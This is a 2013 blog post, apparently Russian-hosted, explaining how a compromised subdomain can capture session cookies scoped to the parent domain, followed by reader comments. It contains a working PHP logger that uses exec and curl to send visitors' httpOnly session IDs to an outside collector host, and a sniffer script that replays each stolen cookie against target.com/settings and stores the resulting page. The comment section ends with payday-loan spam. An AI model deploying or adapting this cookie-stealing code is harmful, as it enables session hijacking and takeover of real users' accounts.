понедельник, 8 апреля 2013 г.

Exploiting server-side vulns as client-side?!!

Sounds terrible, does not it? This post is obviously of course ;)

But sometimes this is effective attack vector, for example, whenever you can exploit any subdomain (news.your-target.com) but can not exploit main domain (your-target.com).

You can track cookies at any subdomain even if they were protected by httpOnly/Security.
Look to RFC6265 http://tools.ietf.org/html/rfc6265:

4.1.2.3. The Domain Attribute
The Domain attribute specifies those hosts to which the cookie will be sent. For example, if the value of the Domain attribute is "example.com", the user agent will include the cookie in the Cookie header when making HTTP requests to example.com, www.example.com, and www.corp.example.com. (Note that a leading %x2E ("."), if present, is ignored even though that character is not permitted, but a trailing %x2E ("."), if present, will cause the user agent to ignore the attribute.) If the server omits the Domain attribute, the user agent will return the cookie only to the origin server.

Tracking cookies are possible when main server sending Set-cookie header with "domain" attribute.
Logger to inject into subdomain may looks like:
<?php
if(!isset($_COOKIE['session_id']) || !preg_match('/$ASYOUWANT^/s',$_COOKIE['session_id']) || isset($_SESSION['already_logged'])){
   //do nothing
}else{
   //exec called for asynchronous request
   exec("curl http://security-auditor.com/sniffer.php?session_id=".$_COOKIE['session_id'])." &";//httpOnly cookie of course
   $_SESSION['already_logged']=true;
}
?>
Simple code of described sniffer listed below:
<?php
$ssid = @$_GET['session_id'];
if($ssid!=""){
 // download page as a client
 $opts = array(
  'http'=>array(
    'method'=>"GET",
    'header'=>"Accept-language: en\r\n" .
              "Cookie: session_id=$ssid;\r\n"
  )
 );
 $context = stream_context_create($opts);
 $file = file_get_contents('https://target.com/settings', false, $context);
 if(!file_exists("/tmp/sess-$ssid")){
        file_put_contents("/tmp/sess-$ssid","Cookie: session_id=$ssid; \n".$file ); } }
?>

6 комментариев:

  1. What if the sub-domain has a CMS i.e. Wordpress and main domain has static or another cms, does it work?

    ОтветитьУдалить
  2. There is no difference on subdomains CMS.
    If main domain sends "Set-cookie: " with domain= attribute this should work

    ОтветитьУдалить
  3. On the off chance that you don't have credit, or you have terrible credit, and you don't have the money, how is that bill paid? If not for payday advances, that bill wouldn't be paid.
    Check Cashing San-diego

    ОтветитьУдалить
  4. So in the event that you require money quick, a bank advance is not for you. Bank credits work preferred for arranged costs over for unanticipated money related crises.
    Cash Advance Chicago

    ОтветитьУдалить
  5. So what do you do? Given the innovative headway, you can essentially sign on to an online fund website that gives quick loans.
    Payday Loans Chula-vista

    ОтветитьУдалить
  6. Since this kind of advance is regularly less demanding to acquire than a conventional bank credit, you'll have the capacity to rapidly get the money you have to dispatch a mid year business. Car Title Loans

    ОтветитьУдалить